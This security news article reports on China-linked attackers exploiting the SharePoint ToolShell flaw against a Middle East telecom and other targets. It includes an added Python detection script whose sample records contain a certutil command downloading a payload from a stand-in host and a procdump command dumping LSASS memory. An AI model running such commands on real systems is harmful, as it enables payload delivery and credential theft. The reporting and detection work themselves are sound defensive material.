APT

China-linked hackers exploit patched ToolShell flaw to breach Middle East telecom

China-based threat actors exploited ToolShell SharePoint flaw CVE-2025-53770 soon after its July patch.

China-linked threat actors exploited the ToolShell SharePoint vulnerability, tracked as CVE-2025-53770, to breach a telecommunications company in the Middle East shortly after Microsoft addressed the flaw in July 2025.

“China-based attackers used the ToolShell vulnerability (CVE-2025-53770) to compromise a telecoms company in the Middle East shortly after the vulnerability was publicly revealed and patched in July 2025,” reads the report published by Broadcom’s Symantec Threat Hunter Team.

According to Broadcom’s Symantec Threat Hunter Team, the attackers, linked to Glowworm (aka Earth Estries) and UNC5221, breached multiple targets, including two African government departments, two South American agencies, and a U.S. university. The hackers used tools like Zingdoor and KrustyLoader, and targeted SQL and Apache ColdFusion servers. A fake “mantec.exe” (masquerading as Symantec software) sideloaded malware. Additional victims include a state tech agency in Africa, a Middle Eastern ministry, and a European finance firm.

In July, Microsoft warned of a SharePoint zero-day vulnerability, tracked as CVE-2025-53770 (CVSS score of 9.8), that was under active exploitation. The vulnerability is a deserialization of untrusted data in on-premises Microsoft SharePoint Server; an unauthenticated attacker could exploit it to execute code over a network.

Microsoft later confirmed that three China-based groups, Budworm, Violet Typhoon (aka Sheathminer), and Storm-2603, had exploited ToolShell, with the latter deploying Warlock ransomware.

Also targeted were government departments in an African country, government agencies in South America, and a university in the U.S., as well as, likely, a state technology agency in an African country, a government department in the Middle East, and a finance company in a European country.

According to Broadcom’s Symantec Threat Hunter Team, the attacks involved the exploitation of CVE-2025-53770, a now-patched security flaw in on-premise SharePoint servers that could be used to bypass authentication and achieve remote code execution.

Malicious activity at a Middle Eastern telecom began on July 21, 2025, two days after ToolShell was patched, with attackers using a webshell and DLL sideloading to deploy backdoors and loaders. Zingdoor was sideloaded via a Trend Micro binary to collect data, transfer files and run commands. Threat actors sideloaded the ShadowPad backdoor using a BitDefender binary; it supports plug-in updates and has been used alongside ransomware. On July 25, attackers dropped the Rust-based KrustyLoader to fetch second-stage payloads, evade analysis and self-delete. Attackers also employed a variety of publicly available and living-off-the-land tools, including Certutil for file downloads, GoGo Scanner for network scanning, Revsocks for proxying traffic through firewalls, and Sysinternals’ Procdump, PowerSploit’s Minidump, and LsassDumper to extract LSASS process memory and steal credentials.
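The tooling described above (Certutil downloads, Procdump and similar utilities reading LSASS memory, and unsigned DLLs sideloaded by a legitimate-looking executable) leaves recognisable traces in endpoint telemetry. The following triage script is an added example written for this article, not code from the report or from Symantec; it runs a few simple detection rules over constructed Sysmon-style process-creation (event 1) and image-load (event 7) records. The sample records, the `example.invalid` URL, the `C:\ProgramData\Upd\` paths, and the `vendorlib.dll` name are all constructed for illustration; `mantec.exe` is the masquerading filename named in the report.

```python
"""Triage Sysmon-style process-create and image-load records for the
living-off-the-land and credential-dumping patterns described in the report.
Added example; record shape is a simplified JSON export of Sysmon fields."""
import ntpath

# Constructed sample telemetry (not real logs). EventID 1 = process create,
# EventID 7 = image load. "Signed" refers to the loaded image in event 7.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://example.invalid/stage.bin C:\Users\Public\stage.bin"},
    {"EventID": 1, "Image": r"C:\Users\Public\procdump64.exe",
     "CommandLine": r"procdump64.exe -accepteula -ma lsass.exe C:\Users\Public\out.dmp"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt"},
    {"EventID": 7, "Image": r"C:\ProgramData\Upd\mantec.exe",
     "ImageLoaded": r"C:\ProgramData\Upd\vendorlib.dll", "Signed": "false"},
    {"EventID": 7, "Image": r"C:\Windows\System32\svchost.exe",
     "ImageLoaded": r"C:\Windows\System32\rpcrt4.dll", "Signed": "true"},
]

# Certutil switches commonly seen when it is abused as a downloader.
CERTUTIL_DOWNLOAD_SWITCHES = ("-urlcache", "-split", "-verifyctl")
# Tools named in the report that read LSASS memory (names lower-cased).
LSASS_DUMP_TOOLS = {"procdump.exe", "procdump64.exe", "lsassdumper.exe"}


def basename(path):
    """Lower-cased file name of a Windows path (ntpath works on any OS)."""
    return ntpath.basename(path).lower()


def check_process_create(ev):
    """Return (rule, detail) findings for one process-creation record."""
    findings = []
    image = basename(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "").lower()
    # Rule 1: certutil fetching content from a URL.
    if image == "certutil.exe" and "http" in cmd and any(s in cmd for s in CERTUTIL_DOWNLOAD_SWITCHES):
        findings.append(("certutil_download", cmd))
    # Rule 2: a known dumper, or a full-memory dump switch, aimed at lsass.
    if "lsass" in cmd and (image in LSASS_DUMP_TOOLS or "-ma" in cmd.split()):
        findings.append(("lsass_memory_access", cmd))
    return findings


def check_image_load(ev):
    """Heuristic for DLL sideloading: an executable outside the Windows
    directory loads an unsigned DLL that sits in its own directory."""
    loader = ev.get("Image", "")
    loaded = ev.get("ImageLoaded", "")
    signed = ev.get("Signed", "").lower() == "true"
    loader_dir = ntpath.dirname(loader).lower()
    same_dir = loader_dir == ntpath.dirname(loaded).lower()
    in_windows = loader_dir.startswith(r"c:\windows")
    if not signed and same_dir and not in_windows and loaded.lower().endswith(".dll"):
        return [("possible_dll_sideload", f"{loader} loaded unsigned {loaded}")]
    return []


def triage(events):
    """Run every rule over a list of records and collect the findings."""
    findings = []
    for ev in events:
        if ev.get("EventID") == 1:
            findings.extend(check_process_create(ev))
        elif ev.get("EventID") == 7:
            findings.extend(check_image_load(ev))
    return findings


if __name__ == "__main__":
    for rule, detail in triage(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

The sideload rule is deliberately a heuristic: legitimate software also ships unsigned DLLs beside its executable, so in production it belongs in a hunting query that is joined against an allow-list of known vendor install paths rather than in an alert that fires on its own. The LSASS rule is the higher-confidence one; any non-security tool reading LSASS memory warrants an immediate look.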

“An exploit for the Windows LSA Spoofing Vulnerability, CVE-2021-36942 (aka PetitPotam), was also executed,” continues the post. “PetitPotam is an exploitation technique that allows for a threat actor within a compromised network to steal credentials and authentication information from Windows Servers such as a Domain Controller to gain full control of the domain. This is likely used for lateral movement or privilege escalation.”

The attacks reveal ToolShell was exploited by a broader range of China-based threat actors than initially known. While overlaps exist with Glowworm activity, attribution remains uncertain. The numerous victims suggest mass scanning for vulnerable servers, followed by targeted intrusions focused on credential theft and long-term, covert access, indicating a likely espionage-driven campaign.

“There is some overlap in the types of victims and some of the tools used between this activity and activity previously attributed to Glowworm. However, we do not have sufficient evidence to conclusively attribute this activity to one specific group, though we can say that all evidence points to those behind it being China-based threat actors,” concludes the report. “The large number of apparent victims of this activity is also notable. This may indicate that the attackers were carrying out an element of mass scanning for the ToolShell vulnerability, before then carrying out further activity only on networks of interest.”

Pierluigi Paganini

(SecurityAffairs – hacking, ToolShell)